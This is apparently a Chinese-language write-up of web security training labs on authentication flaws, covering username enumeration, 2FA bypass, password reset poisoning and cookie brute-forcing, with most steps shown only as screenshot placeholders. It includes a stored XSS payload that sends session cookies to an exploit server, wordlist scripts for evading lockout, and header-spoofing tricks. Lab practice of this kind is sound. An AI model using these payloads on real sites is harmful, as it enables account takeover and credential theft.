通过不同响应枚举用户名

image-20221223123538109

尝试登录

image-20221223123709519

image-20221223123757109

image-20221223123857546

image-20221223123927511

添加这些用户名

image-20221223123950901

image-20221223124123121

image-20221223124146658

更改用户名

image-20221223124238752

image-20221223125704193

image-20221223125655574

image-20221223125733882

2FA 简单旁路

image-20221223131734242

image-20221223131818213

使用 wiener登录

image-20221223131837086

发现还存在 code

image-20221223133032449

可以发现我们的邮箱地址

image-20221223133059357

尝试用carlos登录

直接转入

/my-account

image-20221223133326971

密码重置破坏逻辑

image-20221223135259406

image-20221223135345765

存在重置密码

我们这里尝试重置 wiener 的密码

image-20221223135528584

image-20221223135501945

发现发送了 一封邮件

image-20221223141254085

image-20221223141503162

尝试更改carlos的密码

image-20221223144112194

通过细微不同的响应枚举用户名

image-20221223144306889

image-20221223144451055

image-20221223144841461

排下序 发现问题

image-20221223145111213

image-20221223145152919

image-20221223145222858

image-20221223145355926

image-20221223145403611

通过响应计时的用户名枚举

image-20221223151556908

尝试登录

image-20221223151701862

发现成功登录时 直接跳转

image-20221223151737160

但是用户名错误时等待时间较长

image-20221223151834733

密码错误时也一样

image-20221223152013359

但是当尝试爆破时发现 禁止了ip

image-20221223152108922

尝试添加xff头

image-20221223155227429

image-20221223154107563

在 Columns并选择Response received和Response completed选项

image-20221223153546625

image-20221223155558745

可以发现 这里的这个用户名明显 响应时间长一点

image-20221223160246839

image-20221223160322495

image-20221223160342839

可见都是这一个

image-20221223160427358

image-20221223160453646

image-20221223160529017

image-20221223160537630

破解暴力保护,IP 封锁

image-20221223160834087

发现 当连续登录错误三次就会锁定

image-20221223165247166

但是每当成功登录之后就会重置次数

尝试将待选密码和peter进行混合

with open('passwd.txt','r') as f:
s = f.read()
with open('passwd.txt','w') as f2:
end = s.replace("\n","\npeter\n")
f2.write(end)
with open('user.txt','w') as f3:
for i in range(1,100):
f3.write('carlos\nwiener\n')

image-20221223173103314

image-20221223173109100

image-20221223173649253

image-20221223173851194

image-20221223174249158

image-20221223174321435

通过帐户锁定的用户名枚举

image-20221223182900760

image-20221223183902459

这里的目的是为了添加空payload

image-20221223183812516

image-20221223184057603

image-20221223184420564

image-20221223184605216

image-20221223184654152

image-20221223184903792

2FA 破坏逻辑

image-20221223190031550

image-20221223191031440

登录时同样会触发 验证码

image-20221223191309678

是数字 可能存在爆破

image-20221223191748272

image-20221223191911823

尝试爆破

image-20221223200728828

image-20221223200700702

image-20221223200720120

暴力破解保持登录状态的 cookie

image-20221223201817190

image-20221223201804969

可见存在一个 Stay logged in

image-20221223202610466

这里发挥了一个 set-Cookie

image-20221223202646577

可以发现这里的:后面是密码的MD5

image-20221223202715974

image-20221223203326848

image-20221223203934339

image-20221223204226520

image-20221223203956393

image-20221223204048276

image-20221223204300427

image-20221223204308717

image-20221223204320617

离线密码破解

image-20221223205232736

image-20221223205325594

差不多的意思不过这次是离线的

image-20221223210108922

存在存储型xss

<script>document.location='//exploit-0ad600d6044fab3dc5fc4018016d00b4.exploit-server.net/'+document.cookie</script>

image-20221223210148992

image-20221223210216273

image-20221223214706743

onceuponatime

image-20221223214910930

通过中间件进行密码重置中毒

image-20221223221629774

X-Forwarded-Host 字段 如果浏览器向代理服务器发送了一个请求,请求的Host头字段的值是 example.com 代理服务器会修改Host头字段的值为自己的主机名,并添加 “X-Forwarded-Host: example.com” 头字段添加上.

image-20221223222227938

发现token

image-20221223222314626

登录wiener

image-20221223222533449

image-20221223222546823

将token进行替换

image-20221223222445004

image-20221223222616789

通过更改密码暴力破解密码

image-20221224123601746

image-20221224124133437

存在更改密码选项

image-20221224151434884

如果当前密码不正确而两个密码不相同则显示 Current password is incorrect

image-20221224151343300

而如果密码正确 两个密码不相同则显示 New passwords do not match

image-20221224151955459

image-20221224152030372

image-20221224152047461

image-20221224152111180

破损的暴力保护,每个请求多个凭据

image-20221224153847310

with open('passwd.txt','r') as f:
s = f.read()
with open('passwd.txt','w') as f2:
end = s.replace("\n",'","')
f2.write(end)

image-20221224154408797

image-20221224154424733

image-20221224154442489

使用暴力攻击绕过 2FA

image-20221224160844823

image-20221224160934753

image-20221224161052038

image-20221224161229888

image-20221224161255440

image-20221224161325087

image-20221224161359840

image-20221224161525331

image-20221224161532102

目的是在进行每一个请求时都会执行这三个请求

image-20221224161821562

image-20221224161935748

image-20221224161943673

image-20221224185048202

image-20221224185101724